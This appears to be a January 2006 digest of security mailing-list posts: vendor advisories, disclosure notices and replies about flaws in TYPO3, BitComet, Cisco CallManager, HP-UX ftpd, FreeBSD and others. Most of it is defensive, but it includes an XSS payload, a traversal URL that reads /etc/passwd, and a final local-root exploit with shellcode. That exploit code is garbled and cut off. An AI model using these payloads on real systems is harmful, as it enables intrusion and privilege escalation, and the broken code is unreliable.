HITBSecConf2005 Videos Released

2006-01-19 Thread Praburaajan 

Hi all,

After a long wait and a series of misadventures, we are pleased to
announce the availability of the HITBSecConf2005 Kuala Lumpur
videos.

You can grab them here: http://video.hitb.org/2005.html

The videos are distributed via Bit Torrent network and are broken
down into two separate packages.

HITBSecConf2006 will be taking place this year from September
16th - 19th at The Westin Kuala Lumpur. Stay tuned for the CfP
which will be announced sometime next month.

Cheers and enjoy the videos.

--Prabu
http://www.hackinthebox.org

IRM 015: File system path disclosure on TYPO3 Web Content Manager

2006-01-19 Thread Advisories 
--
IRM Security Advisory No. 015

File system path disclosure on TYPO3 Web Content Manager

Vulnerablity Type / Importance: Information Leakage / Medium

Problem discovered: January 13th 2006
Vendor contacted: January 13th 2006
Advisory published: January 19th 2006
--

Abstract:

TYPO3 is a free Open Source content management system for enterprise
purposes on the web and in intranets. It offers full flexibility and
extendability while featuring an accomplished set of ready-made interfaces,
functions and modules.

Description:

IRM has discovered an information leakage vulnerability in TYPO3 that
allows remote users to disclose the file system path of the application when
requesting certain files.

The following files were found to disclose the application path:

http://hostname/typo3/t3lib/thumbs.php
http://hostname/tslib/showpic.php
http://hostname/t3lib/stddb/tables.php

Technical details:

The issue is due to the application failing to properly determine its own
physical path and therefore trying to 'require()' a wrong class file.

 From init.php, line 71:
define('PATH_thisScript',str_replace('//','/', str_replace('\\','/',
(php_sapi_name()=='cgi'||php_sapi_name()=='isapi' 
||php_sapi_name()=='cgi-fcgi')($_SERVER['ORIG_PATH_TRANSLATED']?$_SERVER['
ORIG_PATH_TRANSLATED']:$_SERVER['PATH_TRANSLATED'])? 
($_SERVER['ORIG_PATH_TRANSLATED']?$_SERVER['ORIG_PATH_TRANSLATED']:$_SERVER[
'PATH_TRANSLATED']):($_SERVER['ORIG_SCRIPT_FILENAME']?$_SERVER['ORIG_SCRIPT_
FILENAME']:$_SERVER['SCRIPT_FILENAME'];

 From the PHP manual:
You can define a constant by using the define()-function. Once a constant
is
defined, it can never be changed or undefined

The vulnerable files listed above fail to include init.php and the
'PATH_thisScript' variable is locally calculated:

define('PATH_thisScript',str_replace('//','/', str_replace('\\','/',
(php_sapi_name()=='cgi'||php_sapi_name()=='isapi' 
||php_sapi_name()=='cgi-fcgi')($_SERVER['ORIG_PATH_TRANSLATED']?$_SERVER['
ORIG_PATH_TRANSLATED']:$_SERVER['PATH_TRANSLATED'])? 
($_SERVER['ORIG_PATH_TRANSLATED']?$_SERVER['ORIG_PATH_TRANSLATED']:$_SERVER[
'PATH_TRANSLATED']):($_SERVER['ORIG_SCRIPT_FILENAME']?$_SERVER['ORIG_SCRIPT_
FILENAME']:$_SERVER['SCRIPT_FILENAME'];

define('PATH_site', ereg_replace('[^/]*.[^/]*$','',PATH_thisScript));

define('PATH_t3lib', PATH_site.'t3lib/'); define('PATH_tslib',
PATH_site.'tslib/');

At this point, constants 'PATH_t3lib' and 'PATH_tslib' contain wrong values
and any 'require()' function using these constants will not work and will
disclose the file system path.


Tested Versions:

Version 3.7.1 


Vendor  Patch Information:

Contact was initially made via the TYPO3 bug reporting system on January
13th 2006. 
On January 14th a patch for the issue was published on the site 
(http://bugs.typo3.org/view.php?id=2248)


Workarounds:

IRM are not aware of any workarounds for this issue.


Credits:

Research  Advisory: Rodrigo Marcos


Disclaimer:

All information in this advisory is provided on an 'as is'
basis in the hope that it will be useful. Information Risk Management
Plc is not responsible for any risks or occurrences caused
by the application of this information.

A copy of this advisory may be found at:

http://www.irmplc.com/advisories.htm

--

Information Risk Management Plc.
Kings Building,
Smith Square, London,
United Kingdom 
SW1P 3JJ
+44 (0)207 808 6420

Fortinet Advisory: BitComet URI Buffer Overflow Vulnerability

2006-01-19 Thread Fortinet Research 
Fortinet Security Advisory: FSA-2006-07

BitComet URI Buffer Overflow Vulnerability

Advisory Date  : January 18, 2006
Reported Date  : November 29, 2005
Vendor : BitComet
Affected Products  : BitComet v0.60
Severity   : High
Reference  : http://www.bitcomet.com/doc/download.htm

Description:  Fortinet Security Research Team (FSRT) has
discovered a URI buffer overflow Vulnerability in the BitComet P2P Client
software. It indicates a possible exploit of buffer overflow vulnerability
in BitComet. BitComet is one of the most popular P2P Client for file
sharing, which uses bittorrent protocol. There is a bug in BitComet, a
remote attacker could construct a special .torrent file and put it on any
bt publish web site. When a user downloads the .torrent file and clicks on
publishers name, BitComet will crash. An attacker can run arbitrary
Command on victims host by specially crafted .torrent file.

Impact : Execute arbitrary code

Solution   : BitComet has released a update for this
vulnerability, which is available for downloading from BitComet's web
site.

Fortinet Protection: FortiGate series of security systems have been
updated to detect exploits targeting this vulnerability.

Acknowledgment : Dejun Meng of Fortinet Security Research team found
this vulnerability.

Disclaimer : Although Fortinet has attempted to provide accurate
information in these materials, Fortinet assumes no legal responsibility
for the accuracy or completeness of the information. More specific
information is available on request from Fortinet. Please note that
Fortinet's product information does not constitute or contain any
guarantee, warranty or legally binding representation, unless expressly
identified as such in a duly signed writing.

[eVuln] WebspotBlogging Authentication Bypass Vulnerability

2006-01-19 Thread alex 
New eVuln Advisory:
WebspotBlogging Authentication Bypass Vulnerability
http://evuln.com/vulns/41/summary.html

Summary

Software: WebspotBlogging
Sowtware's Web Site: http://www.webspot.co.uk/
Versions: 3.0
Critical Level: Dangerous
Type: SQL Injection
Class: Remote
Status: Unpatched
Exploit: Available
Solution: Not Available
Discovered by: Aliaksandr Hartsuyeu (eVuln.com)
eVuln ID: EV0041

-Description---
Vulnerable script:
login.php

Variable $_POST[username] isn't properly sanitized before being used in a SQL 
query. This can be used to make any SQL query by injecting arbitrary SQL code.

Condition: gpc_magic_quotes - off

Administrator has an ability to import themes using php code insertion from 
Admin Control Panel.

System access is possible.

--Exploit--
Available at: http://evuln.com/vulns/41/exploit.html


--Solution-
No Patch available.

--Credit---
Discovered by: Aliaksandr Hartsuyeu (eVuln.com)

Cisco Security Advisory: Cisco Call Manager Privilege Escalation

2006-01-19 Thread Cisco Systems Product Security Incident Response Team 
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Cisco Security Advisory: Cisco Call Manager Privilege Escalation

Advisory ID: cisco-sa-20060118-ccmpe

http://www.cisco.com/warp/public/707/cisco-sa-20060118-ccmpe.shtml

Revision 1.0


For Public Release 2006 January 18 1600 UTC (GMT)

- ---

Contents


Summary
Affected Products
Details
Impact
Software Versions and Fixes
Workarounds
Obtaining Fixed Software
Exploitation and Public Announcements
Status of This Notice: FINAL
Distribution
Revision History
Cisco Security Procedures

- -

Summary
===

Cisco CallManager (CCM) is the software-based call-processing
component of the Cisco IP telephony solution which extends enterprise
telephony features and functions to packet telephony network devices
such as IP phones, media processing devices, voice-over-IP (VoIP)
gateways, and multimedia applications. Cisco CallManager versions
with Multi Level Administration (MLA) enabled may be vulnerable to
privilege escalations, which may result in read-only users gaining
administrative access.

Cisco has made free software available to address this vulnerability
for affected customers. There are workarounds available to mitigate
the effects of the vulnerability.

This advisory is posted at 
http://www.cisco.com/warp/public/707/cisco-sa-20060118-ccmpe.shtml.

Affected Products
=

Vulnerable Products
+--

These Cisco CallManager versions with Multi Level Administration
(MLA) enabled are vulnerable:

  * Cisco CallManager 3.2 and earlier
  * Cisco CallManager 3.3, versions earlier than 3.3(5)SR1
  * Cisco CallManager 4.0, versions earlier than 4.0(2a)SR2c
  * Cisco CallManager 4.1, versions earlier than 4.1(3)SR2

No other Cisco products are currently known to be affected by these
vulnerabilities.

Complete this procedure to check if Multi Level Administration is
enabled:

 1. Access CCM Administration with this URL: http://CCMServer/ccmadmin, 
where CCMServer specifies the IP address or name of
the Cisco CallManager server.
 2. Choose User  Access Rights  Configure MLA Parameters. The MLA
Enterprise Parameter Configuration page displays.
 3. MLA is enabled if the Enable MultiLevelAdmin enterprise parameter
is set to True.

Details
===

An administrative user with read-only permission can use a crafted
URL on the CCMAdmin web page to escalate privileges to a full
administrative level. This vulnerability applies to users who are
authenticated to the read-only administrative level. Users with no
administrative access and users with full administrative permissions
continue to work as expected.

Administrative users with access privilege Read Only should not be
confused with the standard User Group named Read Only which is
created at installation. For further details on user groups and
assigning access privileges, please refer to this URL: 
http://www.cisco.com/en/US/products/sw/voicesw/ps556/products_administration_guide_chapter09186a00803ed6ea.html#wp1022471.

  * CSCef75361, CSCsb12765, CSCsb88649, CSCsc26275?CCMAdmin Read Only
User Can Escalate Privileges

Impact
==

Successful exploitation of the vulnerability may result in privilege
escalation where read-only administrative users can gain full
administrative privileges and create, delete, or reset devices.

Software Versions and Fixes
===

When considering software upgrades, also consult 
http://www.cisco.com/go/psirt and any subsequent advisories to 
determine exposure and a complete upgrade solution.

In all cases, customers should exercise caution to be certain the
devices to be upgraded contain sufficient memory and that current
hardware and software configurations will continue to be supported
properly by the new release. If the information is not clear, contact
the Cisco Technical Assistance Center (TAC) or your contracted
maintenance provider for assistance.

Each row of the Cisco CallManager software table (below) describes a
release train which will address all of the vulnerabilities mentioned
in this advisory. If a given release train is vulnerable, then the
earliest possible releases that contain the fixes (the First Fixed
Release) and the anticipated date of availability for each are
listed in the Engineering Special, Service Release, and
Maintenance Release columns. A device running a Cisco CallManager
release in the given train that is earlier than the release in a
specific column (less than the First Fixed Release listed in the
Engineering Special or Special Release column) is known to be
vulnerable to one or more issues. The Cisco CallManager should be
upgraded at least to the indicated release or a later version
(greater than or equal to the First Fixed Release label).

Re: Re: MSN Messenger Password Decrypter for WinXP/2003

2006-01-19 Thread null 
Hi,
This is the author of the MSN Messenger Password Recovery tool. Searched in 
google and found this post.
I would like to assure you that this program is not dangerous and does not 
perform any illegal actions. All it does is read the registry values and 
decrypt them. What's wrong with using UPX?
As far as the link at the bottom is concerned - we are in the process of making 
the Skype tool and will put a proper website in place once we are finished.
Also, regarding you message that this program is malicious:

http://www.softpedia.com/progClean/MSN-Messenger-Password-Recovery-Clean-32261.html

MSN Messenger Password Recovery 1.1.100.2006 - SOFTPEDIA 100% CLEAN AWARD
This software product was tested in the Softpedia labs on: 18 January 2006

CAID 33756 - DM Deployment Common Component Vulnerabilities

2006-01-19 Thread Williams, James K 


Title: CAID 33756 - DM Deployment Common Component
Vulnerabilities

CA Vulnerability ID: 33756

Discovery Date: 2005-12-20

CA Advisory Date: 2006-01-17

Discovered By: Cengiz Aykanat (CA internal audit), and 
Karma[at]DesignFolks[dot]com[dot]au.


Impact: Remote attacker can cause a denial of service condition.


Summary: The following security vulnerability issues have been 
identified in the DM Primer part of the DM Deployment Common 
Component being distributed with some CA products:
1) A Denial of Service (DoS) vulnerability has been identified in 
the handling of unrecognized network messages, which may result 
in high CPU utilization and excessive growth of the DM Primer 
log file.
2) A Denial of Service (DoS) vulnerability has been identified 
with the way in which DM Primer handles receipt of large rogue 
network messages, which can result in DM Primer becoming 
unresponsive. 


Severity: Computer Associates has given this vulnerability a 
Medium risk rating.


Mitigating Factors: These vulnerabilities will only be present if 
you have utilized the DM Deployment mechanism (bundled with the 
affected products) to deploy those products within your 
enterprise environment.


Affected Technologies: Please note that the DM Primer component 
is not a product, but rather a common component that is included 
with multiple products.  Vulnerable versions of the DM Primer 
component are included in the CA products listed in the Affected 
Products section below.  DM Primer component versions v1.4.154 
and v1.4.155 are vulnerable to these issues.  These 
vulnerabilities are not present in DM Primer v11.0 or later.


Affected Products:
- BrightStor Mobile Backup r4.0
- BrightStor ARCserve Backup for Laptops  Desktops r11.0, r11.1, 
r11.1 SP1
- Unicenter Remote Control 6.0, 6.0 SP1
- CA Desktop Protection Suite r2
- CA Server Protection Suite r2
- CA Business Protection Suite r2
- CA Business Protection Suite for Microsoft Small Business 
Server Standard Edition r2
- CA Business Protection Suite for Microsoft Small Business 
Server Premium Edition r2
- CA Business Protection Suite for Midsize Business for Windows 
r2


Affected platforms:
Windows


Platforms NOT affected:
This version of DM Primer is not supported on any other 
platforms.


Status and Recommendation: 
Since this version of DM Primer is only utilized for the initial 
installation of the products, the above vulnerabilities can be 
addressed by simply removing the DM Primer Service after 
deployment.  To remove the DM Primer component follow the 
instructions below:

dmprimer remove -f:

will force the removal of a local DM Primer service,

dmsweep -a1:remotecomp -dp:force

will force the removal of the DM Primer service from a remote 
computer called remotecomp.

The dmsweep command will be available on the DM Deployment 
machine (usually the host for the product manager with which it 
was bundled).  It can take a machine name, an ip address, or a 
range of ip addresses.  Some examples are:

dmsweep -a1:192.168.0.*  -dp:force

will forcibly remove DM Primer from all machines on the 
192.168.0.* subnet

dmsweep -a1:192.168.0.1 -a2:192.168.0.100 -dp:force

will forcibly remove DM Primer from all machines in the range 
192.168.0.1-192.168.0.100

dmsweep -a1:192.168.0.1 -a2:192.168.0.100 -dp:force

will forcibly remove DM Primer from all machines in the range 
192.168.0.1-192.168.0.100


Please refer to the FAQ for answers to commonly asked 
questions.
http://supportconnectw.ca.com/public/ca_common_docs/dmdeploysecurity-faq
s.asp


References: 
(note that URLs may wrap)
DM Deployment Common Component Security Notice
http://supportconnectw.ca.com/public/ca_common_docs/dmdeploysecurity_not
ice.asp

Frequently Asked Questions (FAQ) related to this security update
http://supportconnectw.ca.com/public/ca_common_docs/dmdeploysecurity-faq
s.asp

CA Security Advisor site advisory
http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?id=33756

CVE Reference: Pending
http://cve.mitre.org

OSVDB Reference: Pending
http://osvdb.org

Error Handling in DM Primer
http://www.designfolks.com.au/karma/DMPrimer/


Customers who require additional information should contact CA 
Technical Support at http://supportconnect.ca.com.

For technical questions or comments related to this advisory,
please send email to [EMAIL PROTECTED], or contact me directly.

If you discover a vulnerability in CA products, please report
your findings to [EMAIL PROTECTED], or utilize our Submit a 
Vulnerability form.
URL: http://www3.ca.com/securityadvisor/vulninfo/submit.aspx


Regards,
Ken Williams ; 0xE2941985
Dir. Vuln Research 
CA Vulnerability Research Team


CA, One Computer Associates Plaza. Islandia, NY 11749

Contact http://www3.ca.com/contact/
Legal Notice http://ca.com/calegal.htm
Privacy Policy http://www.ca.com/caprivacy.htm
Copyright 2006 CA.  All rights reserved.

Google's Blogger.com classic HTTP response splitting vulnerability

2006-01-19 Thread Meder Kydyraliev 

Blogger.com classic HTTP response splitting vulnerability
~

0. Original Advisory
~~~
http://o0o.nu/~meder/o0o_Blogger_HTTP_response_splitting.txt


I. Background
~

Blogger.com is Google's blogging service.


II. Description
~~~

Blogger's personal page redirection mechanism contains a classic HTTP
response splitting vulnerability in the Location HTTP header. The
problem occurs due to use of unsanitized user-supplied data in the
Location HTTP header, which enables attacker to inject CRLF(%0d%0a)
characters thus splitting server's response taking full control over
the contents of second HTTP response. Exploitation of the vulnerability
can lead to cross-site scripting (XSS), cache poisioning and phishing
attacks.

The following URL was taking contents of query string and using it in
Location HTTP header without proper sanitation:

http://www.blogger.com/r?[URL here]


III. Vendor status 
~~

Vulnerability has been fixed on 13/01/2006


IV. Disclosure timeline
~~~

02/01/2006 - Issue discovered. Vendor notified.
02/01/2006 - Initial vendor response.
12/01/2006 - Vendor inquired on status.
13/01/2006 - Vendor response and confirmation that bug fixed.


V. References
~

1. http://www.packetstormsecurity.org/papers/general/whitepaper_httpresponse.pdf


-- 
http://o0o.nu/~meder

Re: IRM 015: File system path disclosure on TYPO3 Web Content Manager

2006-01-19 Thread Michael Shigorin 
On Thu, Jan 19, 2006 at 10:30:36AM -, Advisories wrote:
 File system path disclosure on TYPO3 Web Content Manager
 Vulnerablity Type / Importance: Information Leakage / Medium

Hm, since when path disclosure is medium importance?

 The following files were found to disclose the application path:
 http://hostname/typo3/t3lib/thumbs.php
 http://hostname/tslib/showpic.php
 http://hostname/t3lib/stddb/tables.php
 Tested Versions:
 Version 3.7.1 

The first one verified as applicable to 3.8.1 too (easily
avoidable by adding IP- or user-based access restriction
to /typo3 since that's administrative backend anyways),
and the rest doesn't disclose anything on properly configured
at least display_errors-wise webserver, which is a documented
recommended (and often reiterated everywhere) PHP setup.

 Workarounds:
 IRM are not aware of any workarounds for this issue.

Ouch. :)

-- 
  WBR, Michael Shigorin [EMAIL PROTECTED]
  -- Linux.Kiev http://www.linux.kiev.ua/


pgpq8HogPHEMU.pgp
Description: PGP signature

[security bulletin] SSRT5971 rev.1 - HP-UX Running ftpd Remote Denial of Service (DoS)

2006-01-19 Thread security-alert 
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c00592668

Version: 1

HPSBUX02092 SSRT5971 rev.1 - HP-UX Running ftpd Remote Denial of
Service (DoS)

NOTICE: The information in this Security Bulletin should be acted
upon as soon as possible.

Release Date: 2006-01-17
Last Updated: 2006-01-18

Potential Security Impact: Remote Denial of Service (DoS)

Source: Hewlett-Packard Company,
HP Software Security Response Team

VULNERABILITY SUMMARY

A potential security vulnerability has been identified with HP-UX
running ftpd.  The vulnerability could be exploited by a remote
unauthorized user to cause ftpd to become unresponsive, leading to
a Denial fo Service (DoS).

References: None

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP-UX B.11.00, B.11.04, B.11.11, B.11.23 running ftpd

BACKGROUND

To determine if an HP-UX system has an affected version,
search the output of swlist -a revision -l fileset
for one of the filesets listed below. For affected systems
verify that the recommended action has been taken.

AFFECTED VERSIONS

HP-UX B.11.23
=
InternetSrvcs.INETSVCS2-RUN
action: install PHNE_33414 or subsequent

HP-UX B.11.11
=
InternetSrvcs.INETSVCS2-RUN
action: install PHNE_33412 or subsequent

HP-UX B.11.11
=
WUFTP-26.INETSVCS-FTP
action: install revision B.11.11.01.006 or subsequent.

HP-UX B.11.04
=
InternetSrvcs.INETSVCS-RUN
action: install PHNE_34077 or subsequent

HP-UX B.11.00
=
InternetSrvcs.INETSVCS-RUN
action: install PHNE_33406 or subsequent

HP-UX B.11.00
=
WUFTP-26.INETSVCS-FTP
action: install revision B.11.00.01.005 or subsequent.


END AFFECTED VERSIONS
RESOLUTION

HP has made the following patches available to resolve the issue
for the InternetSrvcs product.
The patches can be downloaded from http://itrc.hp.com

B.11.23 - PHNE_33414 or subsequent
B.11.11 - PHNE_33412 or subsequent
B.11.04 - PHNE_34077 or subsequent
B.11.00 - PHNE_33406 or subsequent

HP has made the following software updates available to resolve
the issue for the WUFTP-26 product.  The software updates can be
downloaded from http://www.hp.com/go/softwaredepot

B.11.11 - revision B.11.11.01.006 or subsequent.
B.11.00 - revision B.11.00.01.005 or subsequent.

MANUAL ACTIONS: Yes - Update
B.11.23, B.11.04 - No manual actions.
B.11.11, B.11.00 - InternetSrvcs - No manual actions.
B.11.11, B.11.00 - WUFTP-26 - Install software updates.


PRODUCT SPECIFIC INFORMATION

HP-UX Security Patch Check: Security Patch Check revision B.02.00
analyzes all HP-issued Security Bulletins to provide a subset of
recommended actions that potentially affect a specific HP-UX
system. For more information:
http://software.hp.com/portal/swdepot/displayProductInfo.do?
productNumber=B6834AA


HISTORY
Version:1 (rev.1) - 18 January 2006 Initial release



Support: For further information, contact normal HP Services
support channel.

Report: To report a potential security vulnerability with any HP
supported product, send Email to: [EMAIL PROTECTED]  It is
strongly recommended that security related information being
communicated to HP be encrypted using PGP, especially exploit
information.  To get the security-alert PGP key, please send an
e-mail message as follows:
  To: [EMAIL PROTECTED]
  Subject: get key

Subscribe: To initiate a subscription to receive future HP
Security Bulletins via Email:
http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA;
langcode=USENGjumpid=in_SC-GEN__driverITRCtopiccode=ITRC

On the web page: ITRC security bulletins and patch sign-up
Under Step1: your ITRC security bulletins and patches
  - check ALL categories for which alerts are required and
continue.
Under Step2: your ITRC operating systems
  - verify your operating system selections are checked and
save.

To update an existing subscription:
http://h30046.www3.hp.com/subSignIn.php
Log in on the web page:
  Subscriber's choice for Business: sign-in.
On the web page:
  Subscriber's Choice: your profile summary
- use Edit Profile to update appropriate sections.

To review previously published Security Bulletins visit:
http://www.itrc.hp.com/service/cki/secBullArchive.do

* The Software Product Category that this Security Bulletin
relates to is represented by the 5th and 6th characters of the
Bulletin number in the title:

GN = HP General SW,
MA = HP Management Agents,
MI = Misc. 3rd party SW,
MP = HP MPE/iX,
NS = HP NonStop Servers,
OV = HP OpenVMS,
PI = HP Printing  Imaging,
ST = HP Storage SW,
TL = HP Trusted Linux,
TU = HP Tru64 UNIX,
UX = HP-UX,
VV = HP Virtual Vault


System management and security procedures must be reviewed
frequently to maintain system integrity. HP is continually
reviewing and enhancing the security features of software products
to provide customers with current secure solutions.

HP is broadly distributing this Security Bulletin

Phpclanwebsite BBCode IMG Tag XSS Vulnerability

2006-01-19 Thread [at] 
##Night_WarriorKurdish Hacker
##night_warrior771[at]hotmail.com
##Phpclanwebsite BBCode IMG Tag XSS Vulnerability
##Contact :night_warrior771[at]hotmail.com
##hompage : www.phpclanwebsite.com

Vulnerable:

[img]javascript:alert('XSS')[/img]

Contact :night_warrior771[at]hotmail.com
Night_Warrior

Re: Directory traversal in phpXplorer

2006-01-19 Thread Stan Bubrouski 
Hey,

I just wanted to point out a couple of things I neglected to mention
in my first reply to this advisory:
1) Even if something isn't a critical problem, a vendor should still
respond to the issue, if for no other reason than to straighten out
the situation with the user who had enough insight to spot it and
assume its a problem.
2) Only reporting a bug between Dec 20 - Jan 4 is in bad practice, I
think.  The advisory noted those two dates as when the vendor was sent
an advisory.  As most people know this  period of time is considered
Christmas and New Years vacation in the USA and other places.  Beyond
that the phpXplorer project is an open source project and may not have
dedicated support.

In short a little more leeway should be profited during the holidays
and vendors should always respond to issue like this so no one gets
hung out to dry like this.

Best Regards,
Stan Bubrouski


On 1/16/06, Stan Bubrouski [EMAIL PROTECTED] wrote:
 Seeing as phpXplorer allows the upload and editing of live PHP files
 anyways it seems to me this exploit is completely useless.  You can
 use the script as intended to cat the password file if you want.
 Right?

 -sb


 On 1/16/06, Oriol Torrent [EMAIL PROTECTED] wrote:
  ==
  Title: Directory traversal in phpXplorer
 
  Application: phpXplorer
  Vendor: http://www.phpxplorer.org
  Vulnerable Versions: 0.9.33
  Bug: directory traversal
  Date: 16-January-2006
  Author: Oriol Torrent Santiago  oriol.torrent.AT.gmail.com 
 
  References:
  http://www.arrelnet.com/advisories/adv20060116.html
 
  ==
 
  1) Background
 ---
phpXplorer is an open source file management system written in PHP.
It enables you to work on a remote file system through a web browser.
 
 
  2) Problem description
 
 An attacker can read arbitrary files outside the web root by sending
 specially formed requests
 
Ex:
 
  http://host/phpXplorer/system/workspaces.php?sShare=../../../../../../../../etc/passwd%00ref=1
 
 
  3) Solution:
 --
 No Patch available.
 
 
  4) Timeline
 -
 17/12/2005 Bug discovered
 20/12/2005 Vendor receives detailed advisory. No response
 04/01/2006 Second notification. No response
 16/01/2006 Public Disclosure

Critical security advisory #006 tftpd32 Format string

2006-01-19 Thread admin 
Critical security advisory #006
Tftpd32 2.81 Format String + DoS PoC
Critical Security - 22:03 2006.01.19
Critical Security research: http://www.critical.lt
Product site: http://tftpd32.jounin.net/
Credits : Critical Security Team (www.critical.lt)
Original Advisory: http://www.critical.lt/?vulnerabilities/200
Due to incorrect use of format strings there is a possibility of remote code 
execution. You can trigger this vulnerability
by sending SEND or GET request with a specially formated string. Vulnerable 
code:

LEA ECX,DWORD PTR SS:[ESP+430]
LEA EAX,DWORD PTR SS:[ESP+1C]
PUSH ECX ; /Arglist
PUSH EDX ; |Format
PUSH EAX ; |s = 00E6F4E8
CALL DWORD PTR DS:[USER32.wvsprintfA] ; \wvsprintfA

Proof of concept exploit:
http://www.critical.lt/research/tftpd32_281_dos.txt

MDKSA-2006:017 - Updated mod_auth_ldap packages fix vulnerability

2006-01-19 Thread Mandriva Security Team 
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___
 
 Mandriva Linux Security Advisory MDKSA-2006:017
 http://www.mandriva.com/security/
 ___
 
 Package : mod_auth_ldap
 Date: January 19, 2006
 Affected: Corporate 2.1
 ___
 
 Problem Description:
 
 A format string flaw was discovered in the way that auth_ldap logs
 information which may allow a remote attacker to execute arbitrary code
 as the apache user if auth_ldap is used for authentication.
 
 This update provides version 1.6.1 of auth_ldap which corrects the
 problem.  Only Corporate Server 2.1 shipped with a supported auth_ldap
 package.
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0150
 ___
 
 Updated Packages:
 
 Corporate Server 2.1:
 a579c887e48daaa8281ecdc4e1381fa0  
corporate/2.1/RPMS/mod_auth_ldap-1.6.1-1.2.C21mdk.i586.rpm
 3af337e3989aed18d9c6e634ecb3e47b  
corporate/2.1/SRPMS/auth_ldap-1.6.1-1.2.C21mdk.src.rpm

 Corporate Server 2.1/X86_64:
 b3c27d91b6fa68e557507318c8e18f0c  
x86_64/corporate/2.1/RPMS/mod_auth_ldap-1.6.1-1.2.C21mdk.x86_64.rpm
 3af337e3989aed18d9c6e634ecb3e47b  
x86_64/corporate/2.1/SRPMS/auth_ldap-1.6.1-1.2.C21mdk.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  security*mandriva.com
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.2.4 (GNU/Linux)

iD8DBQFDz9lvmqjQ0CJFipgRAhbvAKDejWx5RUTciABT7qVXho9XOyOH5ACgsi58
FLI7qZytVoR7yezzkdYV47M=
=GvY0
-END PGP SIGNATURE-

FreeBSD Security Advisory FreeBSD-SA-06:05.80211

2006-01-19 Thread FreeBSD Security Advisories 
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

=
FreeBSD-SA-06:05.80211  Security Advisory
  The FreeBSD Project

Topic:  IEEE 802.11 buffer overflow

Category:   core
Module: net80211
Announced:  2006-01-18
Credits:Karl Janmar
Affects:FreeBSD 6.0
Corrected:  2006-01-18 09:03:15 UTC (RELENG_6, 6.0-STABLE)
2006-01-18 09:03:36 UTC (RELENG_6_0, 6.0-RELEASE-p3)
CVE Name:   CVE-2006-0226

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit
URL:http://www.freebsd.org/security/.

I.   Background

The IEEE 802.11 network subsystem of FreeBSD implements the protocol
negotiation used for wireless networking.

II.  Problem Description

An integer overflow in the handling of corrupt IEEE 802.11 beacon or
probe response frames when scanning for existing wireless networks can
result in the frame overflowing a buffer.

III. Impact

An attacker able broadcast a carefully crafted beacon or probe response
frame may be able to execute arbitrary code within the context of the
FreeBSD kernel on any system scanning for wireless networks.

IV.  Workaround

No workaround is available, but systems without IEEE 802.11 hardware or
drivers loaded are not vulnerable.

V.   Solution

Perform one of the following:

1) Upgrade your vulnerable system to 6-STABLE or to the RELENG_6_0
security branch dated after the correction date.

2) To patch your present system:

The following patches have been verified to apply to FreeBSD 6.0 systems.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

# fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-06:05/80211.patch
# fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-06:05/80211.patch.asc

b) Apply the patch.

# cd /usr/src
# patch  /path/to/patch

c) Recompile your kernel as described in
URL:http://www.freebsd.org/handbook/kernelconfig.html and reboot the
system.

VI.  Correction details

The following list contains the revision numbers of each file that was
corrected in FreeBSD.

Branch   Revision
  Path
- -
RELENG_6
  src/sys/net80211/ieee80211_ioctl.c 1.25.2.9
RELENG_6_0
  src/UPDATING  1.416.2.3.2.8
  src/sys/conf/newvers.sh1.69.2.8.2.4
  src/sys/net80211/ieee80211_ioctl.c 1.25.2.3.2.1
- -

VII. References

http://www.signedness.org/advisories/sps-0x1.txt
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0226

The latest revision of this advisory is available at
ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-06:05.80211.asc
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.2 (FreeBSD)

iD8DBQFDzgUEFdaIBMps37IRAnB4AJ9btdO5oRpjDyksIQKhimmnAvaqSgCfdqZJ
q5gy4Ec/4lhZjoaGCbUuncU=
=XgsT
-END PGP SIGNATURE-

Change passwd 3.1 (SquirrelMail plugin )

2006-01-19 Thread rod hedor 


Change passwd  3.1 (SquirrelMail plugin )

Coded by rod hedor

web-- http://lezr.com

[local exploit]

 * Multiple
 buffer overflows are present in the handling of command line
arguements in chpasswd.
  The bug allows a
hacker to exploit the process to run arbitrary code.

#include stdio.h
#include stdlib.h

const char shellcode[]=\x90\x90\x90\x90\x90\x90\x90\x90
   \x90\x90\x90\x90\x90\x90\x90\x90
   \x90\x90\x90\x90\x90\x90\x90\x90
  \x31\xc0\xb0\x17\x31\xdb\xcd\x80
   \x89\xe5\x31\xc0\x50\x55\x89\xe5
  \x50\x68\x6e\x2f\x73\x68\x68\x2f
  \x2f\x62\x69\x89\xe3\x89\xe9\x89
  \xea\xb0\x0b\xcd\x80;

long get_sp(){
__asm__(movl %esp,%eax;);
};

int main(){
char buffer[1024];
long stack = get_sp();
int result = 1;
long offset = 0;
printf ([!] Change_passwd v3.1(SquirrelMail plugin) exploit\n);
printf ([+] Current stack [0x%x]\n,stack);
while(offset = 268435456){
offset = offset + 1;
stack = get_sp() + offset;
memcpy(buffer,EGG=,4);
int a = 4;
while(a = 108){
memcpy(buffer[a],x,1);
a = a + 1;}
memcpy(buffer[108],stack,4);
memcpy(buffer[112],shellcode,sizeof(shellcode));
putenv(buffer);
result = system(./chpasswd $EGG);
